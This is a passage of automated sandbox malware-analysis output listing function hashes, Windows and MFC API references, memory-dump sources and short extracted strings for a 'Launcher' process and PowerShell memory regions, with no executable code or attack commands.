                                                                                                    • Opcode ID: afe2ca31e549ff57c781a35d7325df9aac21fd54d50667b11d0da6d1e5dd803e
                                                                                                    • Instruction ID: 3d6de95c4c5917a6e38026a794bc7da6462ff99d55f734706bd93f81dc7daa8f
                                                                                                    • Opcode Fuzzy Hash: afe2ca31e549ff57c781a35d7325df9aac21fd54d50667b11d0da6d1e5dd803e
                                                                                                    • Instruction Fuzzy Hash: 5DF0F874500311EFD368AB30EC2E9083BA3EB05F21B11A72EE065863F1DFB98540CB10
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0066C938
                                                                                                    • #2634.MFC42U(00000000), ref: 0066C946
                                                                                                    • #6195.MFC42U(006621A0,00000000), ref: 0066C952
                                                                                                    • #2634.MFC42U(00000001), ref: 0066C95B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634$#6195MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287514142-0
                                                                                                    • Opcode ID: 827117f4950e40ff7964c5267675265047e2c1c9c9d6ae1a3c7f301b8f98ecaf
                                                                                                    • Instruction ID: 0c6799fcd233c617f2292edcdae529d170e5ff5bc5752c27247ce0b8901c2110
                                                                                                    • Opcode Fuzzy Hash: 827117f4950e40ff7964c5267675265047e2c1c9c9d6ae1a3c7f301b8f98ecaf
                                                                                                    • Instruction Fuzzy Hash: 3CE0123138432267FB712620BC07FD92A138B84F61F5641A8F70C2E1D7CEA2594781D9
                                                                                                    APIs
                                                                                                    • #6205.MFC42U(?,00000001,00000001), ref: 00671AD1
                                                                                                    • #6205.MFC42U(?,00000001,00000001,?,00000001,00000001), ref: 00671AE1
                                                                                                    • #6211.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00671AE9
                                                                                                    • #2385.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00671AF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6205$#2385#6211
                                                                                                    • String ID:
                                                                                                    • API String ID: 1216781411-0
                                                                                                    • Opcode ID: 9619a37778481ed5aeed8220f994b6fbe8c4aa624ded816f7ed21cded2008f51
                                                                                                    • Instruction ID: bac588d78e747b39a2f6790244738cf91e7abd1d16a84f4268887b883b87e402
                                                                                                    • Opcode Fuzzy Hash: 9619a37778481ed5aeed8220f994b6fbe8c4aa624ded816f7ed21cded2008f51
                                                                                                    • Instruction Fuzzy Hash: CFE0CDA560021427CF70EBF588D5CEFB79FFB4C344740845D705E97141D9215D084764
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067B383
                                                                                                    • #324.MFC42U(00000083,?,00000004,00672D50,?,800E373A), ref: 0067B395
                                                                                                    • #540.MFC42U(00000083,?,00000004,00672D50,?,800E373A), ref: 0067B3A7
                                                                                                    • #861.MFC42U(006621A0,00000083,?,00000004,00672D50,?,800E373A), ref: 0067B3B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #324#540#861H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 2127517272-0
                                                                                                    • Opcode ID: 69eb6d5de6fe2f0f8b68a0882092f892bcd3739527ada4f011d00898fd0c6782
                                                                                                    • Instruction ID: 82ec602ffb4303cd4efd6e370bffe254616f9aaa2c6e5e504a85de9b7f62798a
                                                                                                    • Opcode Fuzzy Hash: 69eb6d5de6fe2f0f8b68a0882092f892bcd3739527ada4f011d00898fd0c6782
                                                                                                    • Instruction Fuzzy Hash: 70E04FB1A00705EBD755FBA48812F9CBA63BFA5310F10805CF2084B282DFF14615C7AA
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #736#794#796#807
                                                                                                    • String ID:
                                                                                                    • API String ID: 2485769241-0
                                                                                                    • Opcode ID: b520a8d61e5a3db0b58ba003704b13bc942c57cb3ed530bc6273ab04111d3dbf
                                                                                                    • Instruction ID: 817775393f794dad20edaf7b2cc2c79a591d16b7786a8c30c3da44c0d7f25afa
                                                                                                    • Opcode Fuzzy Hash: b520a8d61e5a3db0b58ba003704b13bc942c57cb3ed530bc6273ab04111d3dbf
                                                                                                    • Instruction Fuzzy Hash: A6E0EC310066118BC365EF64D9619DABBE3FF99710F208AED906B47151EF722A09CB98
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #609$#693
                                                                                                    • String ID:
                                                                                                    • API String ID: 2192965535-0
                                                                                                    • Opcode ID: 09877052648aeb0a2f5cd7f3514fa3c642eeae78def30597dc77d26b8a902a52
                                                                                                    • Instruction ID: c60f35de9a1592a0806b7f0f70c6d9cef9b94fbed7c66d19d2e581d8e08d7d7f
                                                                                                    • Opcode Fuzzy Hash: 09877052648aeb0a2f5cd7f3514fa3c642eeae78def30597dc77d26b8a902a52
                                                                                                    • Instruction Fuzzy Hash: 3CD01731000A129BC378EB30D4619EAF7A3AF583A0F61896EA1AB03151FF612A0CC754
                                                                                                    APIs
                                                                                                    • #540.MFC42U(800E373A,?,?,00000000,00000000,006809C4,000000FF,?,00672016), ref: 00673ECE
                                                                                                    • #540.MFC42U(800E373A,?,?,00000000,00000000,006809C4,000000FF,?,00672016), ref: 00673EE0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #540
                                                                                                    • String ID: pyg
                                                                                                    • API String ID: 747650028-2258339590
                                                                                                    • Opcode ID: 20019a1809c08eed4295eedd22e6c71467f51c582a1c45d98a8e8bf9f04c45c3
                                                                                                    • Instruction ID: 3ec23c14b07335f64d1f060c3f5c17ff123b3a502b6ecd4fade2ed71deecbe32
                                                                                                    • Opcode Fuzzy Hash: 20019a1809c08eed4295eedd22e6c71467f51c582a1c45d98a8e8bf9f04c45c3
                                                                                                    • Instruction Fuzzy Hash: DC218972A002199FDF05DF98C856BAFB7B6FF41724F104A59E421AF391C7B1A900CB54
                                                                                                    APIs
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 0067D4A1
                                                                                                    • wsprintfW.USER32 ref: 0067D4B2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromStringwsprintf
                                                                                                    • String ID: CLSID\%s\%s
                                                                                                    • API String ID: 1205525775-576494604
                                                                                                    • Opcode ID: 695217a1435c616c7b475a44d982eaa572840a7e35a18d2934692f47e6bd46d7
                                                                                                    • Instruction ID: 774cb13f83c0af2253fb872e74bddab06486209fd4b8281d82f0cf5d9f609e3f
                                                                                                    • Opcode Fuzzy Hash: 695217a1435c616c7b475a44d982eaa572840a7e35a18d2934692f47e6bd46d7
                                                                                                    • Instruction Fuzzy Hash: FCF01D72A00208AB8B00DF99DD45DEF77FEEB86715B114125FD06AB140DA75AB09CBE4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00679137: CoFreeUnusedLibraries.OLE32(00674689,00000000,?), ref: 006791A2
                                                                                                    • #800.MFC42U(800E373A,?,?,006809DF,000000FF), ref: 00674128
                                                                                                    • #800.MFC42U(800E373A,?,?,006809DF,000000FF), ref: 00674133
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$FreeLibrariesUnused
                                                                                                    • String ID: pyg
                                                                                                    • API String ID: 2298315438-2258339590
                                                                                                    • Opcode ID: f189f498d93653694d72b3c93080d45eb58e8a949f8eaa5ce441caf6c1ee27af
                                                                                                    • Instruction ID: e54af2fafe85197ea3bfb9978749b73a9ac0bc2f0823538d5e903d20ac9c36a4
                                                                                                    • Opcode Fuzzy Hash: f189f498d93653694d72b3c93080d45eb58e8a949f8eaa5ce441caf6c1ee27af
                                                                                                    • Instruction Fuzzy Hash: 21F017B1A04159DBCB49EF94DC91BAEB7B6FB49B14F004A2DE426A7781CB356800CB14
                                                                                                    APIs
                                                                                                    • #543.MFC42U(00000000,?,00000000,?,00673E30), ref: 00673D0A
                                                                                                    • InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00673E30), ref: 00673D19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #543CriticalInitializeSection
                                                                                                    • String ID: `g
                                                                                                    • API String ID: 3994007337-2645773341
                                                                                                    • Opcode ID: 25947ef98394c3175f31e8192701a1a410b09c07792f884b0f4e5f4c5a6b63ac
                                                                                                    • Instruction ID: 2d9d8e9dbf2d0953440d6d0f9482a888509b54feb67953a928d572366f35bc5b
                                                                                                    • Opcode Fuzzy Hash: 25947ef98394c3175f31e8192701a1a410b09c07792f884b0f4e5f4c5a6b63ac
                                                                                                    • Instruction Fuzzy Hash: DDD0A7B16003157BC7206F85CC0AA877AEDDB45710F00015AF95597240EAF1ED0087D0
                                                                                                    APIs
                                                                                                    • #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00673D6D,800E373A,?,00000000,00680996,000000FF,?,00672096), ref: 00673F69
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #303
                                                                                                    • String ID: g$SysTreeView32
                                                                                                    • API String ID: 3581465568-3316930138
                                                                                                    • Opcode ID: ea7eca111e77fdde54268f1eeaef3104a47916826f346c52a033bd3a92f0b766
                                                                                                    • Instruction ID: a38c2d851e85fe294fc6df51ccdbca8eb79b4cd71b8c5f3295ea8a8822df9fc1
                                                                                                    • Opcode Fuzzy Hash: ea7eca111e77fdde54268f1eeaef3104a47916826f346c52a033bd3a92f0b766
                                                                                                    • Instruction Fuzzy Hash: 43C012B16046247786201B868C07D467E5DDA80AA0F110159B41457201FAF1AD00C7D8
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #4709#6195
                                                                                                    • String ID: System Configuration
                                                                                                    • API String ID: 513596607-3459905039
                                                                                                    • Opcode ID: fa8c3bcb4469535a4cdf72a45d4880a473e0c0ce7c2db2356f6e1131d36bfd73
                                                                                                    • Instruction ID: 115da33e1d7cc7a219b621f9a39fa6b614892f24129d7a5b4447935fa582956b
                                                                                                    • Opcode Fuzzy Hash: fa8c3bcb4469535a4cdf72a45d4880a473e0c0ce7c2db2356f6e1131d36bfd73
                                                                                                    • Instruction Fuzzy Hash: 1AB09222B656B02656F47134380289E004B9ACA7203A645BAB41AEB391DC96CE0A02C9
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: fc352950512e54f5aa14ca191f964ecc21b23e5a3b34386fe0c1108256d7cf0b
                                                                                                    • Instruction ID: 226eda971a01ae14ae1a50b11505d08cb8528542e6d761b83347ed39e7f47402
                                                                                                    • Opcode Fuzzy Hash: fc352950512e54f5aa14ca191f964ecc21b23e5a3b34386fe0c1108256d7cf0b
                                                                                                    • Instruction Fuzzy Hash: 11F0B231011612DFE7351B14E808BC67BE2EB00732F16991DD069505B1DB75A8D4CF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2e8a9b498d9d2875fbc8e6889dc0b89a4dfa37d73bdf411c7cce5c01cc98e90
                                                                                                    • Instruction ID: 8d1ccac0a6005e3b65cdb0c2875ab62f3e420e38e033e174d15739d23fdcd573
                                                                                                    • Opcode Fuzzy Hash: a2e8a9b498d9d2875fbc8e6889dc0b89a4dfa37d73bdf411c7cce5c01cc98e90
                                                                                                    • Instruction Fuzzy Hash: 75918170F007159BEB29EFB889116AE7BE2EFC4600B00C92DD51AAB354DF35AD058BD5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a242ad74c807b8d2d239b5f6d85cbde33603aabfe4988d9017bdc994a70dc02d
                                                                                                    • Instruction ID: 2ca35afa3888a77ac9da3af313d5db035102056fb4b172cfd14ee90a6cd600c1
                                                                                                    • Opcode Fuzzy Hash: a242ad74c807b8d2d239b5f6d85cbde33603aabfe4988d9017bdc994a70dc02d
                                                                                                    • Instruction Fuzzy Hash: B6918270F007159BEB29EFB889116AE77E2EFC4600B00C92DD51AAB358DF35AD058BD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$pi6j$pi6j$pi6j$pi6j$pi6j$|,8j$Jok$Jok$Jok$Jok$Jok$Jok$rnk$rnk
                                                                                                    • API String ID: 0-3380130301
                                                                                                    • Opcode ID: e6be0363a08ea181fdc487b0164e5de1d7e667b3713483e477a63272be02da1e
                                                                                                    • Instruction ID: 72ac58f1e5c0d81483ebe9a1f7d76339c6a0b1f6416b66f6db770b1e6e4f8f52
                                                                                                    • Opcode Fuzzy Hash: e6be0363a08ea181fdc487b0164e5de1d7e667b3713483e477a63272be02da1e
                                                                                                    • Instruction Fuzzy Hash: 302227B17046069FCB158F69D9807AABBEEFF85311F04807AD505CB252CB39DE45CBA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                                    • API String ID: 0-4000621977
                                                                                                    • Opcode ID: 51d4b4fb1f5c280450358fd2eb79b5bfa9976591f27935aacf8fa1d83486247b
                                                                                                    • Instruction ID: d4fd15865f9b62741c2dae01142cc287d655dc217933cfe3c71421b433f60eaa
                                                                                                    • Opcode Fuzzy Hash: 51d4b4fb1f5c280450358fd2eb79b5bfa9976591f27935aacf8fa1d83486247b
                                                                                                    • Instruction Fuzzy Hash: CB1238B17042868FCB259B79985067BBBAA9FC1310F1480BAE905CF292DF35DF45C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (nq
                                                                                                    • API String ID: 0-2756854522
                                                                                                    • Opcode ID: c052d830ce0dc8de2adf3579d2953f8a1b1e33172faaff6c46b7950c33014d65
                                                                                                    • Instruction ID: f7dc05b6c255b4f1b53a6af228921b9e150960062ed353fea11b4fd883257c48
                                                                                                    • Opcode Fuzzy Hash: c052d830ce0dc8de2adf3579d2953f8a1b1e33172faaff6c46b7950c33014d65
                                                                                                    • Instruction Fuzzy Hash: 42414F34B041048FDB15CFA8C858AAABBF1EF8D314F145098D946EB391DB35ED01CB61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (&jq
                                                                                                    • API String ID: 0-3222446104
                                                                                                    • Opcode ID: d9a30cf65c8d7e06341c55662f509008f1e72504f2cb1d56a51665747d0905a9
                                                                                                    • Instruction ID: 0cdb756e7bf897607ee64be37327026a6edd0dd7e3d3bdd39a0baa2f017b32d1
                                                                                                    • Opcode Fuzzy Hash: d9a30cf65c8d7e06341c55662f509008f1e72504f2cb1d56a51665747d0905a9
                                                                                                    • Instruction Fuzzy Hash: 4921AE71A042588FCB14DFAED804BAFBFF5EB89320F14846AD518A7340CB74A9058BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 825ac2501aa4b8102c71bf611136d77daa5327d85f019615e14a3e458cbe7548
                                                                                                    • Instruction ID: 7b1365978969a86b1f65fd34aae3acbda9a94952a5fe237f0bdf29a5efe1fc8f
                                                                                                    • Opcode Fuzzy Hash: 825ac2501aa4b8102c71bf611136d77daa5327d85f019615e14a3e458cbe7548
                                                                                                    • Instruction Fuzzy Hash: F3918C74A00605CFCB15CF58C9949AEFBB1FF88310B248699DA55AB3A5C736FC91CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d2a668bca3f1a04d23a383ca1675d6ea35bdd95c74d283c927c7fdc3514ae990
                                                                                                    • Instruction ID: 3e2cd30dd1e9d6e750892736ede0cbd3dc5e268047f6f3309ccf2177a008e1d0
                                                                                                    • Opcode Fuzzy Hash: d2a668bca3f1a04d23a383ca1675d6ea35bdd95c74d283c927c7fdc3514ae990
                                                                                                    • Instruction Fuzzy Hash: 4B51E3313042558FD704DB69DC44A6A7BEAFFC9219B2584A9D509CB352EB31EC01CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7317a4346b67e0cc596aa5cc4993cea0514a172a2b5890452b4ff261965cdb7
                                                                                                    • Instruction ID: f1e77e434f40c0509da5d6501fa9a2d43769c1fecbfa629e90ac30b0cbad3d2b
                                                                                                    • Opcode Fuzzy Hash: e7317a4346b67e0cc596aa5cc4993cea0514a172a2b5890452b4ff261965cdb7
                                                                                                    • Instruction Fuzzy Hash: A2612671E00208CFDB14DFA9C984A9DBBF5EF88314F14816AE918AB354EB34AC41CB60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2ae9c181aa293b160308a61186444a05ac79d643c4ce11b3f7338c7371acf210
                                                                                                    • Instruction ID: 79c7be473806ad5942a1056b4e721739c8b79522b93999bfa10fa62640d3cf41
                                                                                                    • Opcode Fuzzy Hash: 2ae9c181aa293b160308a61186444a05ac79d643c4ce11b3f7338c7371acf210
                                                                                                    • Instruction Fuzzy Hash: 25513B71E00248DFDB14DFA9D984A9DFBF5FF88310F14806AE919AB364EB34A845CB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0688c9451a85ef378bc797fff010870c7a341fac93c33f21eedf506bc5afa36
                                                                                                    • Instruction ID: 88fc7b99dedc99ad318d2e8126c0f43daee717abeaf396be4433fb767e39afa6
                                                                                                    • Opcode Fuzzy Hash: c0688c9451a85ef378bc797fff010870c7a341fac93c33f21eedf506bc5afa36
                                                                                                    • Instruction Fuzzy Hash: 4831D5F0A14282DBCB358E29C58067A77EBAF84704F1580A5D9049F256DB35FF45CBB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 29aecdc418af4122cc627bf87459fe195eb95d0ff918e761dba490fe3e883cd5
                                                                                                    • Instruction ID: a6d9eaed8198bd23602040b5f388a60b13b16e249193c968e062931862bf9f0a
                                                                                                    • Opcode Fuzzy Hash: 29aecdc418af4122cc627bf87459fe195eb95d0ff918e761dba490fe3e883cd5
                                                                                                    • Instruction Fuzzy Hash: 9E413874A00505DFCB05CF58C9989AEFBB1FF48314B258599DA19AB368D732FC91CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
